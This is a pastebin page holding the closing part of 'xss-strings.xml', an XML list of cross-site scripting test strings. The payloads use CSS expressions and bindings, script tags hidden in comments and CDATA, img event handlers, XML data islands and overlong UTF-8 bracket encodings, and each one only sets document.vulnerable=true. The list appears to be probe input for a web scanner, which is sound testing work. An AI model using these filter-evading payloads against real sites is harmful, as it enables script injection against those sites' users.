		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;div style=&quot;behaviour: url([link to code]);&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;div style=&quot;binding: url([link to code]);&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;div style=&quot;width: expression(document.vulnerable=true;);&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;style type=&quot;text/javascript&quot;&gt;document.vulnerable=true;&lt;/style&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;object classid=&quot;clsid:...&quot; codebase=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.vulnerable=true;//--&gt;&lt;/script&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;![CDATA[&lt;!--]]&lt;script&gt;document.vulnerable=true;//--&gt;&lt;/script&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;!-- -- --&gt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;&lt;!-- -- --&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;img src=&quot;blah&quot;onmouseover=&quot;document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;img src=&quot;blah&gt;&quot; onmouseover=&quot;document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;xml src=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;xml id=&quot;X&quot;&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;div datafld=&quot;b&quot; dataformatas=&quot;html&quot; datasrc=&quot;#X&quot;&gt;&lt;/div&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ [\xC0][\xBC]script&gt;document.vulnerable=true;[\xC0][\xBC]/script&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
	&lt;/attacks&gt;
&lt;/exportedattacks&gt;

Create Shorturl - Create a shorter url that redirects to your paste?

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

xss-strings.xml

Reply to "xss-strings.xml"